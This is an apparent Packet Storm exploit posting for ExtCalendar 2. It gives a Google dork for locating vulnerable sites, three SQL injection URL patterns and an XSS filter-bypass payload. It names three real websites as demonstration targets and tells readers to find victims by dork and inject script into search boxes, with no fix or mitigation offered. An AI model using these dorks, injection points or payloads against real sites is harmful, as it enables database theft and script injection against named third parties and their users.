ExtCalendar 2 suffers from remote SQL injection and cross site scripting vulnerabilities.
6b5f29099e2db9b381424196371bf2687a5a04c7ab036f78b8450aa121b8e0d7---------------IN THE NAME OF ALLAH-----------------
Title: ExtCalendar 2 Multipe Vulnerabilities
Discovered By : Ashiyane Digital Security Team
Author : Ashiyane Digital Security Team
Dork : intext:Powered by ExtCalendar 2
Exploit :
localhost/calendar.php?mode=view&id={SQL}
localhost/calendar.php?mode=cat&cat_id={SQL}
localhost/calendar/cal_popup.php?mode=view&id={SQL}
DeMO:
http://www.boatworksmall.com/events/calendar.php?mode=cat&cat_id=1
http://www.jolietmudturtles.org/calendar/cal_popup.php?mode=view&id=78
http://www.projecthired.org/calendar/calendar.php?mode=view&id=485
Xss :
Find Target With Google Dork And Put Your Script In Search Box
And SomeTimes It Will Need ByPass :
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
Tnx : Ali_Eagle - HaShoR - HidDeEn - Pr0grammer - hossein19123 - Rz04 - khatarnak
And My Friends : M.R.S.CO - IrIsT - Tak.FaNaR - E2MA3N - black.king - Nafsh & ...
./Mr.Cicili
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed